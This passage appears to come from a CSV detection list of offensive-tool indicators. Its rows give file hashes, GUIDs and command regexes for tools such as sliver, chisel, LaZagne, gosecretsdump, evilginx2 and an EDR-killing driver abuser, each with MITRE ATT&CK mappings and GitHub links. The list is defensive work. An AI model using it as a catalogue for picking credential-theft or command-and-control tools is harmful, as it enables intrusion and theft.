Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*0a3659cf00c99f85805b64bdbde13f3f3993163c0eaa5a6345e301c4331fb581*",".{0,1000}0a3659cf00c99f85805b64bdbde13f3f3993163c0eaa5a6345e301c4331fb581.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*0a99e30e751c3a01ffe34efaa615c55a6cbbc42038f7004ac356dad5dbba1ada*",".{0,1000}0a99e30e751c3a01ffe34efaa615c55a6cbbc42038f7004ac356dad5dbba1ada.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0aa6a04c0e8bb0022ccbe0c6f2bf6bc1806c59ffffae3981ae083e49e78573b7*",".{0,1000}0aa6a04c0e8bb0022ccbe0c6f2bf6bc1806c59ffffae3981ae083e49e78573b7.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*0aaf0c9b2f4f67ea3012cef59464ce4899556e29920bdbec219f469e1b8fe935*",".{0,1000}0aaf0c9b2f4f67ea3012cef59464ce4899556e29920bdbec219f469e1b8fe935.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0ac4490e04a65d571cc7b069b5070a4853516300b8ea43bd304ca484bf68c761*",".{0,1000}0ac4490e04a65d571cc7b069b5070a4853516300b8ea43bd304ca484bf68c761.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*0ac82760-3e0d-4124-bd1c-92c8dab97171*",".{0,1000}0ac82760\-3e0d\-4124\-bd1c\-92c8dab97171.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","0","N/A","8","4","327","109","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z" "*0acac34993ed96c9c8ba60fd6914937c626330b2e490885fd0b9837e171a3c44*",".{0,1000}0acac34993ed96c9c8ba60fd6914937c626330b2e490885fd0b9837e171a3c44.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - 
T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0ADFD1F0-7C15-4A22-87B4-F67E046ECD96*",".{0,1000}0ADFD1F0\-7C15\-4A22\-87B4\-F67E046ECD96.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*0ae12dd51a6faf674521da0fbb3cb8aba5425934aee91b6e204386b38505ab49*",".{0,1000}0ae12dd51a6faf674521da0fbb3cb8aba5425934aee91b6e204386b38505ab49.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0aebcf5b97bf1ae6286c7aa7000f1ee68b063bd9ded6c871c708c8e639793c3f*",".{0,1000}0aebcf5b97bf1ae6286c7aa7000f1ee68b063bd9ded6c871c708c8e639793c3f.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat 
sheets","8","10","N/A","N/A","N/A","N/A" "*0af1e638d78ecb998aa44a6716084ce830af74c68c641bc1634a9841de3caa76*",".{0,1000}0af1e638d78ecb998aa44a6716084ce830af74c68c641bc1634a9841de3caa76.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0b1a6a5a3e7a22a2f68a7b2b83b33117a63f0d6337dddb3d41b250a995210d79*",".{0,1000}0b1a6a5a3e7a22a2f68a7b2b83b33117a63f0d6337dddb3d41b250a995210d79.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","8","3","202","33","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z" "*0b3924b330e85ff7db62e4d7e665397fd04c3b056b135a184aa87fcabbf1fad9*",".{0,1000}0b3924b330e85ff7db62e4d7e665397fd04c3b056b135a184aa87fcabbf1fad9.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*0b6c277ada6299603f6af3a2ec7bf7134df0c71d8f45438eeb65a2455d351e27*",".{0,1000}0b6c277ada6299603f6af3a2ec7bf7134df0c71d8f45438eeb65a2455d351e27.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential 
Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*0B6D8B01-861E-4CAF-B1C9-6670884381DB*",".{0,1000}0B6D8B01\-861E\-4CAF\-B1C9\-6670884381DB.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","0","N/A","10","10","1426","688","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*0b79812a3202ddcd7f58de6c1912beed92b163a0ad930193b02f134059d8c420*",".{0,1000}0b79812a3202ddcd7f58de6c1912beed92b163a0ad930193b02f134059d8c420.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0b8e4ffbabf5f6e7167013a324e67e2a359d35043145eb8af7d8815e7e12242b*",".{0,1000}0b8e4ffbabf5f6e7167013a324e67e2a359d35043145eb8af7d8815e7e12242b.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*0ba663873a7926866e3dd717b970f7e651700d00e9d99f667dfd473eafa81b8a*",".{0,1000}0ba663873a7926866e3dd717b970f7e651700d00e9d99f667dfd473eafa81b8a.{0,1000}","offensive_tool_keyword","KExecDD","Admin to Kernel code execution using the KSecDD driver","T1068 - T1055.011","TA0004 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/floesen/KExecDD","1","0","N/A","8","2","172","27","2024-04-19T09:58:14Z","2024-04-19T08:54:49Z" "*0bc38984ce64aa213a77c2c9125a68a057f76f354a44060f8342d5375368ef04*",".{0,1000}0bc38984ce64aa213a77c2c9125a68a057f76f354a44060f8342d5375368ef04.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*0bcce0874f30d8d38fabb4fcc1bb44fc60d811c7ff1ae3d3869601d44d65a80a*",".{0,1000}0bcce0874f30d8d38fabb4fcc1bb44fc60d811c7ff1ae3d3869601d44d65a80a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0bdf933e7adf4960c337d0badbd044ccf14ab36731360c5c92001c9c5feded21*",".{0,1000}0bdf933e7adf4960c337d0badbd044ccf14ab36731360c5c92001c9c5feded21.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0byt3m1n1-V2*",".{0,1000}0byt3m1n1\-V2.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*0c19f220188feff67261fd9ac6448ee06b84b8e836f1e558592c2b381e671194*",".{0,1000}0c19f220188feff67261fd9ac6448ee06b84b8e836f1e558592c2b381e671194.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0c28929dbbc6cfe733ed93670025f18f03642a4b323d7fd123ae63c9366afc31*",".{0,1000}0c28929dbbc6cfe733ed93670025f18f03642a4b323d7fd123ae63c9366afc31.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential 
Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*0c2b8e134f235970726f41712824ce62f42635e4bd647dfcdb58c8fff88cff36*",".{0,1000}0c2b8e134f235970726f41712824ce62f42635e4bd647dfcdb58c8fff88cff36.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0c3379e3cc4fab5cbf1ce0aff52559da191a2b97c6fa27d5122232649f78e7cc*",".{0,1000}0c3379e3cc4fab5cbf1ce0aff52559da191a2b97c6fa27d5122232649f78e7cc.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","file_hash","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*0c64315cdf7bd0e51e76f04510c91d931b8b4de73f06ea7931666e62cb34739f*",".{0,1000}0c64315cdf7bd0e51e76f04510c91d931b8b4de73f06ea7931666e62cb34739f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0c649fe30b4986eff17b3913a02a89728126d530298659f1fe1ea07570428c2b*",".{0,1000}0c649fe30b4986eff17b3913a02a89728126d530298659f1fe1ea07570428c2b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*0c7fdc11cd301457131335dc023726493d839cd18ab659c9ab3a53fbe24269c1*",".{0,1000}0c7fdc11cd301457131335dc023726493d839cd18ab659c9ab3a53fbe24269c1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0C81C7D4-736A-4876-A36E-15E5B2EF5117*",".{0,1000}0C81C7D4\-736A\-4876\-A36E\-15E5B2EF5117.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*0C89EC7D-AC60-4591-8F6B-CB5F20EC0D8D*",".{0,1000}0C89EC7D\-AC60\-4591\-8F6B\-CB5F20EC0D8D.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques 
research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*0c8e33156886e733d0021652fe0a13b03946fc09adb392458fb2a435fb402d85*",".{0,1000}0c8e33156886e733d0021652fe0a13b03946fc09adb392458fb2a435fb402d85.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0C8F49D8-BD68-420A-907D-031B83737C50*",".{0,1000}0C8F49D8\-BD68\-420A\-907D\-031B83737C50.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*0ca10134908aead6310e72aae31b7eca8e653ccfa9a2bad686cea277367e4f83*",".{0,1000}0ca10134908aead6310e72aae31b7eca8e653ccfa9a2bad686cea277367e4f83.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
"*0cb5af2ee5239ef9d399446af3088fd26fff2e012b9f8b7e7e59569c8d7d6369*",".{0,1000}0cb5af2ee5239ef9d399446af3088fd26fff2e012b9f8b7e7e59569c8d7d6369.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0cb85b94cf22a5eb8c6a391c9546aeeb1d86b7e7ae482b512de0f45c3ed90f26*",".{0,1000}0cb85b94cf22a5eb8c6a391c9546aeeb1d86b7e7ae482b512de0f45c3ed90f26.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*0cd6b6f2c8164d440a118eb546a05d54232cedd792b4e5998cd653a5f3921a40*",".{0,1000}0cd6b6f2c8164d440a118eb546a05d54232cedd792b4e5998cd653a5f3921a40.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*0cf8787b1bfb746c629b92dc5a471a436105e176d306a2808a636adab4df1508*",".{0,1000}0cf8787b1bfb746c629b92dc5a471a436105e176d306a2808a636adab4df1508.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*0cffe83538d449fae070161c557a89aad53f47d7472eb22c2cfc3c2671852fa6*",".{0,1000}0cffe83538d449fae070161c557a89aad53f47d7472eb22c2cfc3c2671852fa6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0d1448c1bc3c43a7a989e251079fcd0bea32cb8864b4b00cb8c17310464fd06d*",".{0,1000}0d1448c1bc3c43a7a989e251079fcd0bea32cb8864b4b00cb8c17310464fd06d.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*0D17A4B4-A7C4-49C0-99E3-B856F9F3B271*",".{0,1000}0D17A4B4\-A7C4\-49C0\-99E3\-B856F9F3B271.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","10","4","345","63","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*0d1a410e8085517a23da9fee226564169f767570993dcbb8f0b81b579a50e541*",".{0,1000}0d1a410e8085517a23da9fee226564169f767570993dcbb8f0b81b579a50e541.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*0d1n * --post * --payloads *",".{0,1000}0d1n\s.{0,1000}\s\-\-post\s.{0,1000}\s\-\-payloads\s.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*0d1n --host*",".{0,1000}0d1n\s\-\-host.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*0d1n*kill_listener.sh*",".{0,1000}0d1n.{0,1000}kill_listener\.sh.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*0d33356f9addc458bf9fc3861d9cafef954a51b66412b1cfc435eede351733f1*",".{0,1000}0d33356f9addc458bf9fc3861d9cafef954a51b66412b1cfc435eede351733f1.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). 
Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "*0d6730ca52c1a887006e318a677aa70ed059c67c4bb82af56fec792b2a72e1c9*",".{0,1000}0d6730ca52c1a887006e318a677aa70ed059c67c4bb82af56fec792b2a72e1c9.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*0dayCTF/reverse-shell-generator*",".{0,1000}0dayCTF\/reverse\-shell\-generator.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 